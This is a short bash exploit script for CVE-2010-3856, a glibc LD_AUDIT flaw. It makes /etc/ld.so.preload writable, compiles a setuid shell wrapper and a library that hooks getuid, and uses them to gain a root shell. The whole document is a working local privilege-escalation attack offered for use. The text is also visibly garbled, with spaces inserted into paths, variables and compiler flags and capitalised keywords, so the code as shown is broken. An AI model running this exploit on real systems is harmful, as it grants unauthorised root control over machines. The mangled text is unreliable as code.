#! / Bin / bash
# CVE-2010-3856
# Author: deadbyte
 
OUTPUT = / etc / ld.so.preload
 
MASK = `umask`
umask 0
LD_AUDIT = "libpcprofile.so" PCPROFILE_OUTPUT = "$ OUTPUT" ping 2> / dev / null
if [! -F $ OUTPUT]; then
  echo "System does not appear to be vulnerable"
  exit 0
fi
echo-n> $ OUTPUT
umask $ MASK
 
cat> sh.c << EOF
# Include <unistd.h>
# Include <stdio.h>
int main (int argc, char ** argv, char ** envp)
{
  char * args [] = {"/ bin / bash", NULL};
  setuid (geteuid ());
  setgid (getegid ());
  execve (args [0], args, envp);
  perror ("execve failed");
  return 0;
}
EOF
gcc sh.c-o sh
 
cat> libpwn.c << EOF
# Include <sys/stat.h>
# Include <unistd.h>
uid_t getuid (void)
{
  chown ("$ PWD / sh", 0, 0);
  chmod ("$ PWD / sh", S_ISUID | S_IRUSR | S_IWUSR | S_IXUSR | S_IRGRP | S_IXGRP | S_IROTH | S_IXOTH);
  return 0;
}
EOF
gcc-Wall-fPIC-c libpwn.c
gcc-shared-Wl,-soname, libpwn.so-o libpwn.so libpwn.o
 
echo "$ PWD / libpwn.so"> $ OUTPUT
ping 2> / dev / null
echo-n> $ OUTPUT
. / Sh